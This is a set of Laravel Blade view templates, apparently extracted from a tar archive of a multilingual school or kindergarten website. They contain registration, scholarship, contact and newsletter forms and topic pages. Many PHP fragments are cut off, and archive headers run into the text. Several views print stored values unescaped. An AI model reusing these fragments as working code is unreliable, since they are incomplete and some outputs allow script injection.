{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('address',"", array('placeholder' => trans('frontLang.address'),'class' => 'form-control','id'=>'address', 'data-msg'=> trans('frontLang.enterYourAddress'),'data-rule'=>'minlen:4')) !!}

{{trans('frontLang.pupilDetails')}}

{!! Form::text('cname',"", array('placeholder' => trans('frontLang.cname'),'class' => 'form-control','id'=>'cname', 'data-msg'=> trans('frontLang.enterPupilName'),'data-rule'=>'minlen:4')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
{{Form::select('sex',['F' => trans('frontLang.female'),'M' => trans('frontLang.male')],null,['class'=>'form-control','placeholder' => trans('frontLang.chooseSex')])}}
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseStage'))); ?>

{{trans('frontLang.KindergardenDetails')}}

trans('frontLang.northernNeighborhood'), '2' => trans('frontLang.easternNeighborhood'),'3' => trans('frontLang.westernNeighborhood'), '4' => trans('frontLang.southernNeighborhood')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseNeighborhood'))); ?>
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.choosekindergarden'))); ?>
{!! Form::textarea('kindergartenFormNotes','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'kindergartenFormNotes','rows'=>'5')) !!}
{{Form::close()}}
@endif @if ($WebmasterSection->form_status&& $Topic->id=="41")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'kindergartenForm'])}}

{{trans('frontLang.parentDetails')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.fullName'),'class' => 'form-control','id'=>'name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::number('Id',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'idNumber', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:9','min'=>'9')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('address',"", array('placeholder' => trans('frontLang.address'),'class' => 'form-control','id'=>'address', 'data-msg'=> trans('frontLang.enterYourAddress'),'data-rule'=>'minlen:4')) !!}

{{trans('frontLang.pupilDetails')}}

{!! Form::text('cname',"", array('placeholder' => trans('frontLang.cname'),'class' => 'form-control','id'=>'cname', 'data-msg'=> trans('frontLang.enterPupilName'),'data-rule'=>'minlen:4')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
trans('frontLang.female'), 'M' => trans('frontLang.male')),null, array('class' => 'form-control','placeholder' =>trans('frontLang.chooseSex'))); ?>
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseStage'))); ?>

{{trans('frontlang.KindergardenDetails')}}

trans('frontLang.northernNeighborhood'), '2' => trans('frontLang.easternNeighborhood'),'3' => trans('frontLang.westernNeighborhood'), '4' => trans('frontLang.southernNeighborhood')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseNeighborhood'))); ?>
trans('frontLang.Kindergardenyear1'), '2' => trans('frontLang.Kindergardenyear2'), '3' => trans('frontLang.Kindergardenyear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.choosekindergarden'))); ?>
{!! Form::textarea('message','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'order_message','rows'=>'5')) !!}
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
{{Form::close()}}
@endif @if ($WebmasterSection->form_status&& $Topic->id=="42")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['applicationSubmit'],'method'=>'POST','class'=>'applicationForm','files'=>true,'id'=>'applicationForm'])}}

{{trans('frontLang.applicationSubmission')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.pName'),'class' => 'form-control','id'=>'name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('fname',"", array('placeholder' => trans('frontLang.fName'),'class' => 'form-control','id'=>'fname', 'data-msg'=> trans('frontLang.yourFamilyName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::file('residencePermitFile', array('class' => 'form-control','id'=>'residencePermit')) !!}
{!! Form::file('file2', array('class' => 'form-control','id'=>'file2')) !!}
{!! Form::file('file3', array('class' => 'form-control','id'=>'file2')) !!}
{{Form::close()}}
@endif @if ($WebmasterSection->form_status&& $Topic->id=="0")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['schoolerShipForm'],'method'=>'POST','class'=>'schoolerShipForm','files'=>true,'id'=>'schoolerShipForm'])}}

{{trans('frontLang.schoolership')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.pName'),'class' => 'form-control','id'=>'pname', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('fname',"", array('placeholder' => trans('frontLang.fName'),'class' => 'form-control','id'=>'fname', 'data-msg'=> trans('frontLang.yourFamilyName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('idNumber',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'idNumber', 'data-msg'=> trans('frontLang.enterid'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('sex',"", array('placeholder' => trans('frontLang.chooseSex'),'class' => 'form-control','id'=>'sex')) !!}
{!! Form::text('MaritalStatus',"", array('placeholder' => trans('frontLang.MaritalStatus'),'class' => 'form-control','id'=>'MaritalStatus','data-rule'=>'minlen:4')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
{!! Form::label('employmentstatus', trans('frontLang.employmentstatus') ) !!} {!! Form::file('employmentstatusFile', array('placeholder' => trans('frontLang.IdFileMessage') ,'class' => 'form-control','id'=>'employmentstatusFile')) !!}

{{trans('frontLang.study')}}

{!! Form::text('institute',"", array('placeholder' => trans('frontLang.institute'),'class' => 'form-control','id'=>'institute')) !!}
{!! Form::text('studyStart',"", array('placeholder' => trans('frontLang.studyStart'),'class' => 'form-control','id'=>'studyStart')) !!}
{!! Form::text('studySubject',"", array('placeholder' => trans('frontLang.studySubject'),'class' => 'form-control','id'=>'studySubject')) !!}
{!! Form::text('degree',"", array('placeholder' => trans('frontLang.degree'),'class' => 'form-control','id'=>'degree')) !!}
{!! Form::label('CollectionDepartmentApproval', trans('frontLang.CollectionDepartmentApproval') ) !!}
{!! Form::file('CollectionDepartmentApproval', array('class' => 'form-control','id'=>'CollectionDepartmentApproval')) !!}

{{trans('frontLang.familyInfo')}}

{!! Form::text('fatherName',"", array('placeholder' => trans('frontLang.fatherName'),'class' => 'form-control','id'=>'fatherName')) !!}
{!! Form::text('fatherId',"", array('placeholder' => trans('frontLang.fatherId'),'class' => 'form-control','id'=>'fatherid')) !!}
{!! Form::text('motherName',"", array('placeholder' => trans('frontLang.motherName'),'class' => 'form-control','id'=>'motherName')) !!}
{!! Form::text('motherId',"", array('placeholder' => trans('frontLang.motherId'),'class' => 'form-control','id'=>'motherid')) !!}
{!! Form::text('brotherscountUnder21',"", array('placeholder' => trans('frontLang.brotherscountUnder21'),'class' => 'form-control','id'=>'brotherscountUnder21')) !!}
{!! Form::text('studentbrothers',"", array('placeholder' => trans('frontLang.studentbrothers'),'class' => 'form-control','id'=>'studentbrothers')) !!}

{{trans('frontLang.socialSituation')}}

{!! Form::label('notWorkingDeclaration', trans('frontLang.notWorkingDeclaration') ) !!}
{!! Form::label('disabilityStatement', trans('frontLang.disabilityStatement') ) !!}
{{Form::close()}}
@endif @if($WebmasterSection->related_status) @if(count($Topic->relatedTopics)) @endif @endif
@if(count($Categories) >0) @include('frontEnd.includes.slide') @endif
@endsection @section('footerInclude') @if(count($Topic->maps) >0) @foreach($Topic->maps->slice(0,1) as $map) longitude . "," . $map->latitude; ?> @endforeach @endif @endsectionviews/frontEnd/contact.blade.php000064400000057211147565226270012720 0ustar00@extends('frontEnd.layout') @section('content') $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } if ($Topic->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } ?>
@if($WebmasterSection->type==2 && $Topic->video_file!="") {{--video--}}
@if($Topic->video_type ==1) video_file); ?> @if($Youtube_id !="") {{-- Youtube Video --}} @endif @elseif($Topic->video_type ==2) video_file); ?> @if($Vimeo_id !="") {{-- Vimeo Video --}} @endif @else @endif
@elseif($WebmasterSection->type==3 && $Topic->audio_file!="") {{--audio--}}
@elseif(count($Topic->photos)>0) {{--photo slider--}}
    @if($Topic->photo_file !="")
  • {{ $title }}
  • @endif @foreach($Topic->photos as $photo)
  • {{ $photo->title  }}
  • @endforeach
@else {{--one photo--}}
@if($Topic->photo_file !="") {{ $title }} @endif
@endif {!! $Topic->$details !!} @if($Topic->attach_file !="") attach_file, "."); $file_ext = strtolower($file_ext); ?>
@if($file_ext ==".jpg"|| $file_ext ==".jpeg"|| $file_ext ==".png"|| $file_ext ==".gif")
{{ $title }}
@else  {{ trans('frontLang.downloadAttach') }} @endif
@endif {{-- Show Additional attach files --}} @if(count($Topic->attachFiles)>0)
@foreach($Topic->attachFiles as $attachFile) $title_var != "") { $file_title = $attachFile->$title_var; } else { $file_title = $attachFile->$title_var2; } ?> @endforeach
@endif
@if(count($Topic->maps) >0)

{{ trans('frontLang.locationMap') }}


@endif

{{ trans('frontLang.getInTouch') }}

 {{ trans('frontLang.youMessageSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['contactPage'],'method'=>'POST','class'=>'contactForm'])}}
{!! Form::text('contact_name',"", array('placeholder' => trans('frontLang.yourName'),'alt' => trans('frontLang.yourName'),'title' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('contact_email',"", array('placeholder' => trans('frontLang.yourEmail'),'alt' => trans('frontLang.yourEmail'),'title' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('contact_phone',"", array('placeholder' => trans('frontLang.phone'),'alt' => trans('frontLang.phone'),'title' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('contact_subject',"", array('placeholder' => trans('frontLang.subject'),'alt' => trans('frontLang.subject'),'title' => trans('frontLang.subject'),'class' => 'form-control','id'=>'subject', 'data-msg'=> trans('frontLang.enterYourSubject'),'data-rule'=>'minlen:4')) !!}
{!! Form::textarea('contact_message','', array('placeholder' => trans('frontLang.message'),'alt' => trans('frontLang.message'),'title' => trans('frontLang.message'),'class' => 'form-control','id'=>'message','rows'=>'8', 'data-msg'=> trans('frontLang.enterYourMessage'),'data-rule'=>'required')) !!}
@if(env('NOCAPTCHA_STATUS', false))
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
@endif

{{Form::close()}}

{{ trans('frontLang.contactDetails') }}

@if(Helper::GeneralSiteSettings("contact_t1_" . trans('backLang.boxCode')) !="")
{{ trans('frontLang.address') }}:
{{ Helper::GeneralSiteSettings("contact_t1_" . trans('backLang.boxCode')) }}
@endif @if(Helper::GeneralSiteSettings("contact_t3") !="")

{{ trans('frontLang.callPhone') }}:
{{ Helper::GeneralSiteSettings("contact_t3") }}

@endif @if(Helper::GeneralSiteSettings("contact_t5") !="")

{{ trans('frontLang.callMobile') }}:
{{ Helper::GeneralSiteSettings("contact_t5") }}

@endif @if(Helper::GeneralSiteSettings("contact_t4") !="")

{{ trans('frontLang.callFax') }}:
{{ Helper::GeneralSiteSettings("contact_t4") }}

@endif @if(Helper::GeneralSiteSettings("contact_t6") !="")

{{ trans('frontLang.email') }}:
{{ Helper::GeneralSiteSettings("contact_t6") }}

@endif @if(Helper::GeneralSiteSettings("contact_t7_" . trans('backLang.boxCode')) !="")

{{ trans('frontLang.callTimes') }}:
{{ Helper::GeneralSiteSettings("contact_t7_" . trans('backLang.boxCode')) }}

@endif
@endsection @section('footerInclude') @if(count($Topic->maps) >0) @foreach($Topic->maps->slice(0,1) as $map) longitude . "," . $map->latitude; ?> @endforeach @endif @endsectionviews/frontEnd/topics.blade.php000064400000125205147565226270012565 0ustar00@extends('frontEnd.layout') @section('content')
@if($Topics->total() == 0)
  {{ trans('frontLang.noData') }}
@elseif($Topics->total() == 1) @include('frontEnd.topic-partial',array('Topic'=>$Topics[0])) @else
@if((strcmp($url,"form") == 0) ||(strcmp($url,"he/form") == 0) || (strcmp($url,"he/sounds") == 0) || (strcmp($url,"sounds") == 0) || (strcmp($url,"services/7") == 0) || (strcmp($url,"he/services/8") == 0) || (strcmp($url,"he/services/7") == 0) || (strcmp($url,"services/8") == 0))
name }}> @foreach($Topics->reverse() as $Topic) $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } if ($Topic->$details_var != "") { $details = $Topic->$details_var; } else { $details = $Topic->$details_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } // set row div if (($i == 1 && !empty($Categories) ) || ($i == 2 && empty($Categories) )) { $i = 0; echo "
"; } if ($Topic->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = url(trans('backLang.code') . "/" . $Topic->$slug_var); } else { $topic_link_url = url($Topic->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = route('FrontendTopicByLang', ["lang" => trans('backLang.code'), "section" => $Topic->webmasterSection->name, "id" => $Topic->id]); } else { $topic_link_url = route('FrontendTopic', ["section" => $Topic->webmasterSection->name, "id" => $Topic->id]); } } ?>
@endforeach
{{ trans('backLang.'.$WebmasterSection->name) }} {{ trans('backLang.bannerDetails') }} {{ trans('frontLang.click') }}
{{$title}} {{str_replace(" ", ' ',str_limit(strip_tags($details), $limit = 350, $end = '...'))}} link
@elseif($Topics->total() > 1) @foreach($Topics as $Topic) $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } if ($Topic->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } // set row div if (($i == 1 && !empty($Categories) ) || ($i == 2 && empty($Categories) )) { $i = 0; echo "
"; } if ($Topic->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = url(trans('backLang.code') . "/" . $Topic->$slug_var); } else { $topic_link_url = url($Topic->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = route('FrontendTopicByLang', ["lang" => trans('backLang.code'), "section" => $Topic->webmasterSection->name, "id" => $Topic->id]); } else { $topic_link_url = route('FrontendTopic', ["section" => $Topic->webmasterSection->name, "id" => $Topic->id]); } } ?>
@if($Topic->webmasterSection->type==2 && $Topic->video_file!="") {{--video--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->video_type ==1) video_file); ?> @if($Youtube_id !="") {{-- Youtube Video --}} @endif @elseif($Topic->video_type ==2) video_file); ?> @if($Vimeo_id !="") {{-- Vimeo Video --}} @endif @elseif($Topic->video_type ==3) @if($Topic->video_file !="") {{-- Embed Video --}} {!! $Topic->video_file !!} @endif @else @endif
@elseif($Topic->webmasterSection->type==3 && $Topic->audio_file!="") {{--audio--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@elseif(!empty($Topic->photos)) {{--photo slider--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="")
{{ $title }}
@endif @foreach($Topic->photos as $photo)
{{ $photo->title  }}
@endforeach
@else {{--one photo--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@endif {{--Additional Feilds--}} @if(!empty($Topic->webmasterSection->customFields) )
@foreach($Topic->webmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } $cf_saved_val = ""; $cf_saved_val_array = array(); if (!empty($Topic->fields) ) { foreach ($Topic->fields as $t_field) { if ($t_field->field_id == $customField->id) { if ($customField->type == 7) { // if multi check $cf_saved_val_array = explode(", ", $t_field->field_value); } else { $cf_saved_val = $t_field->field_value; } } } } ?> @if(($cf_saved_val!="" || !empty($cf_saved_val_array) ) && ($customField->lang_code == "all" || $customField->lang_code == trans('backLang.boxCode'))) @if($customField->type ==12) {{--Vimeo Video Link--}} @elseif($customField->type ==11) {{--Youtube Video Link--}} @elseif($customField->type ==10) {{--Video File--}} @elseif($customField->type ==9) {{--Attach File--}} @elseif($customField->type ==8) {{--Photo File--}} @elseif($customField->type ==7) {{--Multi Check--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if (in_array($line_num,$cf_saved_val_array)) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==6) {{--Select--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if ($line_num == $cf_saved_val) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==5) {{--Date & Time--}}
{!! $cf_title !!} :
{!! date('Y-m-d H:i:s', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==4) {{--Date--}}
{!! $cf_title !!} :
{!! date('Y-m-d', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==3) {{--Email Address--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==2) {{--Number--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==1) {{--Text Area--}} @else {{--Text Box--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@endif @endif @endforeach
@endif {{--End of -- Additional Feilds--}}

{{ str_replace(" ", ' ',str_limit(strip_tags($Topic->$details), $limit = 350, $end = '...')) }}

@if($Topic->WebmasterSection->name=="form") {{ trans('frontLang.fillForm') }} @else {{ !empty($Topic->photos)? trans('frontLang.seeMore') :trans('frontLang.readMore')}} @endif
@endforeach
{!! $Topics->links() !!}

{{ $Topics->firstItem() }} - {{ $Topics->lastItem() }} {{ trans('backLang.of') }} ( {{ $Topics->total() }} ) {{ trans('backLang.records') }}
@endif @endif
@if(!empty($Categories) || (strcmp($WebmasterSection->name.'',"form") == 0)) @include('frontEnd.includes.slide') @endif
@endsectionviews/frontEnd/includes/foot.blade.php000064400000014567147565226270014051 0ustar00 {{--ajax subscribe to news letter--}} @if(Helper::GeneralSiteSettings("style_subscribe")) @endif {!! Helper::SaveVisitorInfo($PageTitle) !!} views/frontEnd/includes/slide.blade.php000064400000037604147565226270014177 0ustar00
views/frontEnd/includes/subscribe.blade.php000064400000003267147565226270015056 0ustar00@if(Helper::GeneralSiteSettings("style_subscribe"))

  {{ trans('frontLang.newsletter') }}

{{ trans('frontLang.subscribeToOurNewsletter') }}

 {{ trans('frontLang.subscribeToOurNewsletterDone') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'subscribeForm'])}}
{!! Form::text('subscribe_name',"", array('placeholder' => trans('frontLang.yourName'),'alt' => trans('frontLang.yourName'),'title' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'subscribe_name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('subscribe_email',"", array('placeholder' => trans('frontLang.yourEmail'),'alt' => trans('frontLang.yourEmail'),'title' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'subscribe_email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{{Form::close()}}
@endifviews/frontEnd/includes/colors.blade.php000064400000023507147565226270014375 0ustar00views/frontEnd/includes/footer.blade.php000064400000043030147565226300014355 0ustar00 views/frontEnd/includes/menu.blade.php000064400000043625147565226300014035 0ustar00 views/frontEnd/includes/slider.blade.php000064400000011121147565226300014335 0ustar00@if(count($SliderBanners)>0) @endifviews/frontEnd/includes/header.blade.php000064400000013573147565226300014320 0ustar00
  {{strip_tags(trans('backLang.siteInbox'))}} @if($WebmasterSettings->languages_count >=2)   |   @if(trans('backLang.code')=="ar" && $WebmasterSettings->ar_box_status) @if($WebmasterSettings->en_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.englishBox')))) }} @endif @if($WebmasterSettings->he_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.hebrewBox')))) }} @endif @elseif(trans('backLang.code')=="en" && $WebmasterSettings->en_box_status) @if($WebmasterSettings->he_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.hebrewBox')))) }} @endif @if($WebmasterSettings->ar_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.arabicBox')))) }} @endif @elseif(trans('backLang.code')=="he" && $WebmasterSettings->he_box_status) @if($WebmasterSettings->ar_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.arabicBox')))) }} @endif @if($WebmasterSettings->en_box_status) {{ str_replace("[ ","",str_replace(" ]","",strip_tags(trans('backLang.englishBox')))) }} @endif @endif @endif
{{$PageTitle}} {{($PageTitle !="")? "|":""}} {{ Helper::GeneralSiteSettings("site_title_" . trans('backLang.boxCode')) }}
views/frontEnd/includes/desktop.ini000064400000000216147565226300013451 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/frontEnd/includes/head.blade.php000064400000005275147565226300013771 0ustar00 {{$PageTitle}} {{($PageTitle !="")? "|":""}} {{ Helper::GeneralSiteSettings("site_title_" . trans('backLang.boxCode')) }} @if( trans('backLang.direction')=="rtl") @endif @if(Helper::GeneralSiteSettings("style_fav") !="") @else @endif @if(Helper::GeneralSiteSettings("style_apple") !="") @else @endif views/frontEnd/home.blade.php000064400000112071147565226300012203 0ustar00@extends('frontEnd.layout') @section('content') @include('frontEnd.includes.slider') @if(count($TextBanners)>0) @foreach($TextBanners->slice(0,1) as $TextBanner) webmasterBanner->type; } catch (Exception $e) { $TextBanner_type = 0; } ?> @endforeach 3) { $col_width = 3; } ?>
@endif @if(count($HomeTopics)>0)

{{ trans('frontLang.homeContents1Title') }}

{{ trans('frontLang.homeContents1desc') }}
@foreach($HomeTopics->reverse() as $HomeTopic) $title_var != "") { $title = $HomeTopic->$title_var; } else { $title = $HomeTopic->$title_var2; } if ($HomeTopic->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } if ($HomeTopic->webmasterSection->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomeTopic->webmasterSection->$slug_var); } else { $section_url = url($HomeTopic->webmasterSection->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomeTopic->webmasterSection->name); } else { $section_url = url($HomeTopic->webmasterSection->name); } } if ($HomeTopic->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = url(trans('backLang.code') . "/" . $HomeTopic->$slug_var); } else { $topic_link_url = url($HomeTopic->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $topic_link_url = route('FrontendTopicByLang', ["lang" => trans('backLang.code'), "section" => $HomeTopic->webmasterSection->name, "id" => $HomeTopic->id]); } else { $topic_link_url = route('FrontendTopic', ["section" => $HomeTopic->webmasterSection->name, "id" => $HomeTopic->id]); } } ?>

@if($HomeTopic->icon !="")   @endif {{ $title }}

@if($HomeTopic->photo_file !="") {{ $title }} @endif {{--Additional Feilds--}} @if(count($HomeTopic->webmasterSection->customFields) >0)
@foreach($HomeTopic->webmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } $cf_saved_val = ""; $cf_saved_val_array = array(); if (count($HomeTopic->fields) > 0) { foreach ($HomeTopic->fields as $t_field) { if ($t_field->field_id == $customField->id) { if ($customField->type == 7) { // if multi check $cf_saved_val_array = explode(", ", $t_field->field_value); } else { $cf_saved_val = $t_field->field_value; } } } } ?> @if(($cf_saved_val!="" || count($cf_saved_val_array) > 0) && ($customField->lang_code == "all" || $customField->lang_code == trans('backLang.boxCode'))) @if($customField->type ==12) {{--Vimeo Video Link--}} @elseif($customField->type ==11) {{--Youtube Video Link--}} @elseif($customField->type ==10) {{--Video File--}} @elseif($customField->type ==9) {{--Attach File--}} @elseif($customField->type ==8) {{--Photo File--}} @elseif($customField->type ==7) {{--Multi Check--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if (in_array($line_num,$cf_saved_val_array)) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==6) {{--Select--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if ($line_num == $cf_saved_val) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==5) {{--Date & Time--}}
{!! $cf_title !!} :
{!! date('Y-m-d H:i:s', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==4) {{--Date--}}
{!! $cf_title !!} :
{!! date('Y-m-d', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==3) {{--Email Address--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==2) {{--Number--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==1) {{--Text Area--}} @else {{--Text Box--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@endif @endif @endforeach
@endif {{--End of -- Additional Feilds--}}

{{ str_limit(strip_tags($HomeTopic->$details), $limit = 400, $end = '...') }}   {{ trans('frontLang.readMore') }}

@endforeach
@endif @if(count($HomePhotos)>0)

{{ trans('frontLang.homeContents2Title') }}

{{ trans('frontLang.homeContents2desc') }}
    @foreach($HomePhotos as $HomePhoto) $title_var != "") { $title = $HomePhoto->$title_var; } else { $title = $HomePhoto->$title_var2; } if ($HomePhoto->webmasterSection->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomePhoto->webmasterSection->$slug_var); } else { $section_url = url($HomePhoto->webmasterSection->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomePhoto->webmasterSection->name); } else { $section_url = url($HomePhoto->webmasterSection->name); } } ?> @foreach($HomePhoto->photos as $photo) @if($ph_count<12)
  • @endif @endforeach @endforeach
@endif @if(count($HomePartners)>0)
